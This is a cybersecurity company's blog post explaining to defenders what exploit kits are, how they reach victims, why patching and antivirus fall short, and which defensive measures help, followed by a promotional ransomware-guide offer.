Sage Advice - Cybersecurity Blog

Exploit Kit 101 - What You Need to Know

exploit-kits.jpgBack in the day, hackers needed to write their own code to exploit systems.  But times have changed!  Today’s hackers can license software, known as exploit kits, from other hackers – sometimes for less than a night on the town – that make attacking your systems quicker and easier than ever before. 

What is an exploit kit?

An exploit kit is a software system.  It runs on web servers with the purpose of identifying software vulnerabilities in a client’s machine and exploiting the discovered vulnerabilities. However, an exploit kit is not the "end game" malware, the ultimate reason the hacker wants into your system. It is the tool that hackers use to break in – like a pick to a lock. Once installed, it then can upload and execute malicious code (malware).   

Exploit kits are designed to be extremely easy to use. They are sold in cybercriminal circles, often with vulnerabilities already loaded onto them. Exploit kits are typically modular and include user interfaces that provide settings, controls, and statistics. This means hackers don’t need to be tech-savvy to use them. 

Many developers that license these kits are business-savvy and provide top notch customer service. They are often well-funded, with a business model similar to most corporations – developers, customer support, management, etc.

How do exploit kits get installed?     

  • Phishing attacks. People are the weakest link in the security genre because we’re trusting by nature. Someone clicks on an enticing link and the kit is downloaded and installed.

  • Drive-by-downloads.  If a website allows a viewer to input text – like a response in a discussion forum – a hacker can compromise the site by injecting code. They also use ad networks, so a site that hasn’t been compromised can still serve up malicious content through ads. Exploit kits can be inadvertently downloaded just by visiting these legitimate sites.

  • Domain shadowing. First the hacker obtains domain registrar credentials through a successful attack, usually phishing. This allows them to add host records to an organization’s DNS records and redirect them to their malicious IPs.

    For example, let's say you've determined that you will never worry about traffic to "somelocalcompany.com," and you whitelist the domain. They fall victim to domain shadowing, and now you may have traffic going to "somemalicioushostinrussia.somelocalcompany.com" and not even notice it.  So much for whitelisting by domain! Your systems are headed out to Russia to pick up some nasty code!

Why aren't my existing controls enough?

My users aren’t local admins.  If your users aren’t local admins, they can’t install software, right?  Well, non-admins can still write to specific folders on their PCs (i.e. ProgramData and User Profile), otherwise they wouldn't get any work done. That means hackers can also write to these folders without admin rights. 

As you can imagine, with no installation wizards, no reboots, and no need for admin rights – the user sees nothing. Today's hackers just stick the malicious code where they can, and then add a persistence mechanism, so they survive a system reboot.

Our systems are fully patched.  In theory – and in practice – a fully patched system is certainly less vulnerable to exploits. However hackers have found a way around this as well. Besides the numerous "zero-day" exploits (vulnerabilities that vendors have not patched yet), we've seen code check to see if a vulnerable program is installed, and if not, they're kind enough to install it for you! Then, of course, they proceed to exploit it.

We use antivirus software. Antivirus is a very weak defender to exploit kits for a few different reasons.

First of all, it’s cheap. And if it’s cheap to license (or even if it’s not) the hackers have it, too.  Hackers test their code against a myriad of antivirus, IDS, and IPS software to see if it gets detected.  If it isn’t detected, they’ll use it.  If it is detected, they’ll figure out why and fix it. 

Next, many infections are now file-less.  There is no executable, it’s simply a registry entry.  The registry entry ends up in a run key for either the local machine or the current user, and every time the system boots or that user logs in, a script will run. The script will most likely look like a bunch of gibberish, however when decoded you can see the script that is running.  And the syntax typically says… I want to talk to my malicious server.

Finally antivirus doesn’t usually work if the payload is encrypted.  All it can see is gibberish – no code or script – and the infection totally bypasses it.    

How can I protect my organization?

  1. Have a system for early detection and confirmation (i.e. nDiscovery with nAlert).
  2. Back up your data. This is critical – especially when dealing with ransomware.
  3. If you can block outbound traffic by GeoIP, and you have no business with hacker-havens such as Eastern Europe, Russia, etc. – block the traffic.
  4. If you have a proxy, block “unrated” sites. This can go a very long way to helping reduce your exposure.
  5. Use software restriction policies to block execution from \ProgramData and \Users. Note: This is not something to be taken lightly. Things will break and it needs to be tested thoroughly! Management buy-in is required.
  6. Stop all outbound web browsing. Note: This is definitely taking it to the extreme, and is not right (or plausible) for many organizations.  But it can work for some.  It’s the battle between keeping your end users happy and keeping the organization secure. This is a strategic decision that needs buy-in from the entire leadership team.    

Is there any hope?

The good news is that malware that never talks to another device isn’t going to hurt you – too bad that's exactly what it was created to do.  So after an infection, the first thing malware often does is to talk out to its command and control server.  And when it starts talking, you’re network logs are going see it. 

Early detection by a trained human analyst can help you prevent an incident from becoming a breach, so be sure that you consistently mining your logs for signs of infection.


Free Download: Ransomware Survival Guide

We’ve all seen the headlines. Ransomware attacks are escalating. It’s essential that your organization has the proper controls in place to defend your organization against an attack. But defense strategies are not enough. With some ransomware strains touting success rates of 40% or higher, it’s even more important that your organization is prepared to confidently respond to, and survive, a ransomware attack. This survival guide will arm you with the knowledge you need to defend against and prepare for an attack.

Go to Download

Image courtesy of num_skyman at FreeDigitalPhotos.

Topics: Malware, Ransomware, Cyber Defense


The Sage Cybersecurity Lifecycle

The Sage Data Security Cybersecurity Lifecycle

Cybersecurity isn’t a destination.

There is no single, straight path that will get you to the point where you can say, “We did it! We’re 100% cyber-secure.”

A more realistic destination is cyber resiliency – the ability to prepare for and adapt to changing conditions, so you can withstand and recover rapidly from disruptions. Achieving cyber resilience depends on what we like to call the cybersecurity lifecycle – an ongoing cycle of interconnected elements that compliment and reinforce one another.

Learn More